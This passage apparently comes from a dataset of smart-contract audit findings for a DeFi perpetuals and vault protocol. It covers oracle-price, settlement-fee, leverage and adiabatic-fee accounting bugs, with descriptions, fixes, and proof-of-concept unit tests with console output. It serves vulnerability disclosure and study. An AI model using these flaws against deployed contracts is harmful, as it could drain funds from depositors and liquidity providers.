It results in limited functionality of the protocol as vesting pairs where output tokens are valued more than input tokens cannot be used.",Add a boolean state variable which will describe whether to multiply or divide by the multiplier.,,```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n +Empty orders do not request from oracle and during settlement they use an invalid oracle version with `price=0` which messes up a lot of fees and funding accounting leading to loss of funds for the makers,high,"When `market.update` which doesn't change user's position is called, a new (current) global order is created, but the oracle version is not requested due to empty order. This means that during the order settlement, it will use non-existant invalid oracle version with `price = 0`. This price is then used to accumulate all the data in this invalid `Version`, meaning accounting is done using `price = 0`, which is totally incorrect. 
For instance, all funding and fees calculations multiply by oracle version's price, thus all time periods between empty order and the next valid oracle version will not accumulate any fees, which is funds usually lost by makers (as makers won't receive fees/funding for the risk they take).\\nWhen `market.update` is called, it requests a new oracle version at the current order's timestamp unless the order is empty:\\n```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n\\nThe order is empty when it doesn't modify user position:\\n```\\nfunction isEmpty(Order memory self) internal pure returns (bool) {\\n return pos(self).isZero() && neg(self).isZero();\\n}\\n\\nfunction pos(Order memory self) internal pure returns (UFixed6) {\\n return self.makerPos.add(self.longPos).add(self.shortPos);\\n}\\n\\nfunction neg(Order memory self) internal pure returns (UFixed6) {\\n return self.makerNeg.add(self.longNeg).add(self.shortNeg);\\n}\\n```\\n\\nLater, when a valid oracle version is commited, during the settlement process, oracle version at the position is used:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n // @audit no oracle version at this timestamp, thus it's invalid with `price=0`\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp); \\n\\n context.pending.global.sub(newOrder);\\n // @audit order is invalidated (it's already empty anyway), but the `price=0` is still used everywhere\\n if (!oracleVersion.valid) newOrder.invalidate();\\n\\n VersionAccumulationResult memory accumulationResult;\\n (settlementContext.latestVersion, context.global, accumulationResult) = VersionLib.accumulate(\\n settlementContext.latestVersion,\\n context.global,\\n context.latestPosition.global,\\n newOrder,\\n settlementContext.orderOracleVersion,\\n oracleVersion, // @audit <<< when oracleVersion is 
invalid, the `price=0` will still be used here\\n context.marketParameter,\\n context.riskParameter\\n );\\n// rest of code\\n```\\n\\nIf the oracle version is invalid, the order is invalidated, but the `price=0` is still used to accumulate. It doesn't affect pnl from price move, because the final oracle version is always valid, thus the correct price is used to evaluate all possible account actions, however it does affect accumulated fees and funding:\\n```\\nfunction _accumulateLinearFee(\\n Version memory next,\\n AccumulationContext memory context,\\n VersionAccumulationResult memory result\\n) private pure {\\n (UFixed6 makerLinearFee, UFixed6 makerSubtractiveFee) = _accumulateSubtractiveFee(\\n context.riskParameter.makerFee.linear(\\n Fixed6Lib.from(context.order.makerTotal()),\\n context.toOracleVersion.price.abs() // @audit <<< price == 0 for invalid oracle version\\n ),\\n context.order.makerTotal(),\\n context.order.makerReferral,\\n next.makerLinearFee\\n );\\n// rest of code\\n // Compute long-short funding rate\\n Fixed6 funding = context.global.pAccumulator.accumulate(\\n context.riskParameter.pController,\\n toSkew.unsafeDiv(Fixed6Lib.from(context.riskParameter.takerFee.scale)).min(Fixed6Lib.ONE).max(Fixed6Lib.NEG_ONE),\\n context.fromOracleVersion.timestamp,\\n context.toOracleVersion.timestamp,\\n context.fromPosition.takerSocialized().mul(context.fromOracleVersion.price.abs()) // @audit <<< price == 0 for invalid oracle version\\n );\\n// rest of code\\nfunction _accumulateInterest(\\n Version memory next,\\n AccumulationContext memory context\\n) private pure returns (Fixed6 interestMaker, Fixed6 interestLong, Fixed6 interestShort, UFixed6 interestFee) {\\n // @audit price = 0 and notional = 0 for invalid oracle version\\n UFixed6 notional = context.fromPosition.long.add(context.fromPosition.short).min(context.fromPosition.maker).mul(context.fromOracleVersion.price.abs());\\n// rest of code\\n```\\n\\nAs can be seen, all funding and fees 
accumulations multiply by oracle version's price (which is 0), thus during these time intervals fees and funding are 0.\\nThis will happen by itself during any period when there are no orders, because oracle provider's settlement callback uses `market.update` with empty order to settle user account, thus any non-empty order is always followed by an empty order for the next version and `price = 0` will be used to settle it until the next non-empty order:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('no fees accumulation due to invalid version with price = 0', async () => {\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\nfunction setupOracleAt(price: string, valid : boolean, timestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: valid,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n}\\n\\nconst riskParameter = { // rest of code(await market.riskParameter()) }\\nconst riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\nriskParameterMakerFee.linearFee = parse6decimal('0.005')\\nriskParameterMakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.makerFee = riskParameterMakerFee\\nconst riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\nriskParameterTakerFee.linearFee = 
parse6decimal('0.005')\\nriskParameterTakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.takerFee = riskParameterTakerFee\\nawait market.connect(owner).updateRiskParameter(riskParameter)\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nsetupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\nawait market\\n .connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\nsetupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is commited at timestamp+200\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is not commited at timestamp+300\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 400);\\nsetupOracleAt('0', false, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// settle to see makerValue at all versions\\nsetupOracle('100', TIMESTAMP + 400, TIMESTAMP + 500);\\n\\nawait market.settle(user.address);\\nawait market.settle(userB.address);\\n\\nvar ver = await market.versions(TIMESTAMP + 200);\\nconsole.log(""version 200: longValue: "" + ver.longValue + "" makerValue: "" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 300);\\nconsole.log(""version 300: longValue: "" + ver.longValue + "" makerValue: "" + 
ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 400);\\nconsole.log(""version 400: longValue: "" + ver.longValue + "" makerValue: "" + ver.makerValue);\\n})\\n```\\n\\nConsole log:\\n```\\nversion 200: longValue: -318 makerValue: 285\\nversion 300: longValue: -100000637 makerValue: 100500571\\nversion 400: longValue: -637 makerValue: 571\\n```\\n\\nNotice, that fees are accumulated between versions 200 and 300, version 300 has huge pnl (because it's evaluated at price = 0), which then returns to normal at version 400, but no fees are accumulated between version 300 and 400 due to version 300 having `price = 0`.",Keep the price from the previous valid oracle version and use it instead of oracle version's one if oracle version's price == 0.,"All fees and funding are incorrectly calculated as 0 during any period when there are no non-empty orders (which will be substantially more than 50% of the time, more like 90% of the time). Since most fees and funding are received by makers as a compensation for their price risk, this means makers will lose all these under-calculated fees and will receive a lot less fees and funding than expected.","```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n" +Vault global shares and assets change will mismatch local shares and assets change during settlement due to incorrect `_withoutSettlementFeeGlobal` formula,high,"Every vault update, which involves change of position in the underlying markets, `settlementFee` is charged by the Market. Since many users can deposit and redeem during the same oracle version, this `settlementFee` is shared equally between all users of the same oracle version. 
However, there is an issue in that `settlementFee` is charged once both for deposits and redeems, however `_withoutSettlementFeeGlobal` subtracts `settlementFee` in full both for deposits and redeems, meaning that for global fee, it's basically subtracted twice (once for deposits, and another time for redeems). But for local fee, it's subtracted proportional to `checkpoint.orders`, with sum of fee subtracted equal to exactly `settlementFee` (once). This difference in global and local `settlementFee` calculations leads to inflated `shares` and `assets` added for user deposits (local state) compared to vault overall (global state).\\nHere is an easy scenario to demonstrate the issue:\\nSettlementFee = `$10`\\nUser1 deposits `$10` for oracle version `t = 100`\\nUser2 redeems `10 shares` (worth $10) for the same oracle version `t = 100` (checkpoint.orders = 2)\\nOnce the oracle version `t = 100` settles, we have the following: 4.1. Global deposits = `$10`, redeems = `$10` 4.2. Global deposits convert to `0 shares` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.3. Global redeems convert to `0 assets` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.4. User1 deposit of `$10` converts to `5 shares` (because `_withoutSettlementFeeLocal(10)` applies `settlementFee` of `$5` (because there are 2 orders), returning 10-5=5) 4.5. User2 redeem of `10 shares` converts to `$5` (for the same reason)\\nFrom the example above it can be seen that:\\nUser1 receives 5 shares, but global vault shares didn't increase. 
Over time this difference will keep growing potentially leading to a situation where many user redeems will lead to 0 global shares, but many users will still have local shares which they will be unable to redeem due to underflow, thus losing funds.\\nUser2's assets which he can claim increase by $5, but global claimable assets didn't change, meaning User2 will be unable to claim assets due to underflow when trying to decrease global assets, leading to loss of funds for User2.\\nThe underflow in both cases will happen in `Vault._update` when trying to update global account:\\n```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n",Calculate total orders to deposit and total orders to redeem (in addition to total orders overall). Then `settlementFee` should be multiplied by `deposit/orders` for `toGlobalShares` and by `redeems/orders` for `toGlobalAssets`. This weightening of `settlementFee` will make it in-line with local order weights.,"Any time there are both deposits and redeems in the same oracle version, the users receive more (local) shares and assets than overall vault shares and assets increase (global). 
This mismatch causes:\\nSystematic increase of (sum of user shares - global shares), which can lead to bank run since the last users who try to redeem will be unable to do so due to underflow.\\nSystematic increase of (sum of user assets - global assets), which will lead to users being unable to claim their redeemed assets due to underflow.\\nThe total difference in local and global `shares+assets` equals to `settlementFee` per each oracle version with both deposits and redeems. This can add up to significant amounts (at `settlementFee` = $1 this can be $100-$1000 per day), meaning it will quickly become visible especially for point 2., because typically global claimable assets are at or near 0 most of the time, since users usually redeem and then immediately claim, thus any difference of global and local assets will quickly lead to users being unable to claim.","```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n" +"Requested oracle versions, which have expired, must return this oracle version as invalid, but they return it as a normal version with previous version's price instead",high,"Each market action requests a new oracle version which must be commited by the keepers. 
However, if keepers are unable to commit requested version's price (for example, no price is available at the time interval, network or keepers are down), then after a certain timeout this oracle version will be commited as invalid, using the previous valid version's price.\\nThe issue is that when this expired oracle version is used by the market (using oracle.at), the version returned will be valid (valid = true), because oracle returns version as invalid only if `price = 0`, but the `commit` function sets the previous version's price for these, thus it's not 0.\\nThis leads to market using invalid versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.\\nWhen requested oracle version is commited, but is expired (commited after a certain timeout), the price of the previous valid version is set to this expired oracle version:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nLater, `Market._processOrderGlobal` reads the oracle version using the `oracle.at`, invalidating the order if the version is invalid:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp);\\n\\n context.pending.global.sub(newOrder);\\n if (!oracleVersion.valid) newOrder.invalidate();\\n```\\n\\nHowever, expired oracle version will return `valid = true`, because this flag is only set to `false` if price = 
0:\\n```\\nfunction at(uint256 timestamp) public view returns (OracleVersion memory oracleVersion) {\\n (oracleVersion.timestamp, oracleVersion.price) = (timestamp, _prices[timestamp]);\\n oracleVersion.valid = !oracleVersion.price.isZero(); // @audit <<< valid = false only if price = 0\\n}\\n```\\n\\nThis means that `_processOrderGlobal` will treat this expired oracle version as valid and won't invalidate the order.",Add validity map along with the price map to `KeeperOracle` when recording commited price.,"Market uses invalid (expired) oracle versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.",```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n +"When vault's market weight is set to 0 to remove the market from the vault, vault's leverage in this market is immediately set to max leverage risking position liquidation",medium,"If any market has to be removed from the vault, the only way to do this is via setting this market's weight to 0. The problem is that the first vault rebalance will immediately withdraw max possible collateral from this market, leaving vault's leverage at max possible leverage, risking the vault's position liquidation. This is especially dangerous if vault's position in this removed market can not be closed due to high skew, so min position is not 0, but the leverage will be at max possible value. 
As a result, vault depositors can lose funds due to liquidation of vault's position in this market.\\nWhen vault is rebalanced, each market's collateral is calculated as following:\\n```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n\\nFor removed markets (weight = 0), `marketCollateral` will be set to `marketContext.margin` (i.e. minimum valid collateral to have position at max leverage), `marketAssets` will be set to 0. But later the position will be adjusted in case minPosition is not 0:\\n```\\n target.position = marketAssets\\n .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs())\\n .max(marketContext.minPosition)\\n .min(marketContext.maxPosition);\\n```\\n\\nThis means that vault's position in the market with weight 0 will be at max leverage until liquidated or position can be closed.\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n console.log(""pos1 = "" + (await position()) + "" pos2 = "" + (await btcPosition()) + "" col1 = "" + (await collateralInVault()) + "" col2 = "" + (await btcCollateralInVault()));\\n\\n // update weight\\n await vault.connect(owner).updateWeights([parse6decimal('1.0'), 
parse6decimal('0')])\\n\\n // do small withdrawal to trigger rebalance\\n await vault.connect(user).update(user.address, 0, smallDeposit, 0)\\n await updateOracle()\\n\\n console.log(""pos1 = "" + (await position()) + "" pos2 = "" + (await btcPosition()) + "" col1 = "" + (await collateralInVault()) + "" col2 = "" + (await btcCollateralInVault()));\\n })\\n```\\n\\nConsole log:\\n```\\npos1 = 12224846 pos2 = 206187 col1 = 8008000000 col2 = 2002000000\\npos1 = 12224846 pos2 = 206187 col1 = 9209203452 col2 = 800796548\\n```\\n\\nNotice, that after rebalance, position in the removed market (pos2) is still the same, but the collateral (col2) reduced to minimum allowed.",Ensure that the market's collateral is based on leverage even if `weight = 0`,"Market removed from the vault (weight set to 0) is put at max leverage and has a high risk of being liquidated, thus losing vault depositors funds.",```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n +"Makers can lose funds from price movement even when no long and short positions are opened, due to incorrect distribution of adiabatic fees exposure between makers",medium,"Adiabatic fees introduced in this new update of the protocol (v2.3) were introduced to solve the problem of adiabatic fees netting out to 0 in market token's rather than in USD terms. With the new versions, this problem is solved and adiabatic fees now net out to 0 in USD terms. However, they net out to 0 only for the whole makers pool, but each individual maker can have profit or loss from adiabatic fees at different price levels all else being equal. 
This creates unexpected risk of loss of funds from adiabatic fees for individual makers, which can be significant, up to several percent of the amount invested.\\nThe issue is demonstrated in the following scenario:\\n`price = 1`\\nAlice opens `maker = 10` (collateral = +0.9 from adiabatic fee)\\nBob opens `maker = 10` (collateral = +0.7 from adiabatic fee)\\nPath A. `price = 1`. Bob closes (final collateral = +0), Alice closes (final collateral = +0)\\nPath B. `price = 2`. Bob closes (final collateral = +0.1), Alice closes (final collateral = -0.1)\\nPath C. `price = 0.5`. Bob closes (final collateral = -0.05), Alice closes (final collateral = +0.05)\\nNotice that both Alice and Bob are the only makers, there are 0 longs and 0 shorts, but still both Alice's and Bob's pnl depend on the market price due to pnl from adiabatic fees. Adiabatic fees net out to 0 for all makers aggregated (Alice + Bob), but not for individual makers. Individual makers' pnl from adiabatic fees is more or less random depending on the other makers who have opened.\\nIf Alice were the only maker, then:\\nprice = 1\\nAlice opens `maker = 10` (collateral = +0.9)\\nprice = 2: exposure adjusted +0.9 (Alice collateral = +1.8)\\nAlice closes `maker = 10` (adiabatic fees = `-1.8`, Alice final collateral = 0)\\nFor the lone maker there is no such problem, final collateral is 0 regardless of price. The core of the issue lies in the fact that the maker's adiabatic fees exposure adjustment is weighted by the makers' open maker amount. So in the first example:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split evenly between Alice and Bob (+0.8 for each)\\nAlice new exposure = 0.9 + 0.8 = +1.7 (but adiabatic fees paid to close = -1.8)\\nBob new exposure = 0.7 + 0.8 = +1.5 (but adiabatic fees paid to close = -1.4)\\nIf maker exposure adjustment was weighted by individual makers' exposure, then all is correct:\\nprice = 1. 
Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split 0.9:0.7 between Alice and Bob, e.g. +0.9 for Alice, +0.7 for Bob\\nAlice new exposure = 0.9 + 0.9 = +1.8 (adiabatic fees paid to close = -1.8, net out to 0)\\nBob new exposure = 0.7 + 0.7 = +1.4 (adiabatic fees paid to close = -1.4, net out to 0)\\nIn the worst case, in the example above, if Bob opens `maker = 40` (adiabatic fees scale = 50), then at `price = 2`, Alice's final collateral is `-0.4` due to adiabatic fees. Given that Alice's position is 10 at `price = 2` (notional = 20), a loss of `-0.4` is a loss of `-2%` at 1x leverage, which is quite significant.\\nThe scenario above is demonstrated in the test, change the following test in test/unit/market/Market.test.ts:\\n```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(""user collateral = "" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(""userB collateral = "" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(""ver"" + ver + "": makerValue="" + v.makerValue + "" longValue="" + v.longValue + \\n "" makerPosFee="" + v.makerPosFee + 
"" makerNegFee="" + v.makerNegFee +\\n "" takerPosFee="" + v.takerPosFee + "" takerNegFee="" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n 
setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n\\nConsole log:\\n```\\nuser collateral = 10000000000\\nuserB collateral = 0\\nver1636401093: makerValue=0 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000000000\\nver1636401193: makerValue=0 longValue=0 makerPosFee=9000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000070000\\nver1636401293: makerValue=0 longValue=0 makerPosFee=7000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000150000\\nver1636401393: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000010000\\nver1636401493: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=-14000 takerPosFee=0 takerNegFee=0\\nuser collateral = 9999990000\\nuserB collateral = 10000010000\\nver1636401593: makerValue=-5500 longValue=0 makerPosFee=0 makerNegFee=-4500 takerPosFee=0 takerNegFee=0\\n```\\n\\nNotice, that final user balance is -0.1 and final userB balance is +0.1","Split the total maker exposure by individual maker's exposure rather than by their position size. 
To do this:\\nAdd another accumulator to track total `exposure`\\nAdd individual maker `exposure` to user's `Local` storage\\nWhen accumulating local storage in the checkpoint, account global accumulator `exposure` weighted by individual user's `exposure`.","Individual makers bear an additional undocumented price risk due to adiabatic fees, which is quite significant (can be several percentages of the notional).","```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(""user collateral = "" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(""userB collateral = "" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(""ver"" + ver + "": makerValue="" + v.makerValue + "" longValue="" + v.longValue + \\n "" makerPosFee="" + v.makerPosFee + "" makerNegFee="" + v.makerNegFee +\\n "" takerPosFee="" + v.takerPosFee + "" takerNegFee="" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = 
parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await 
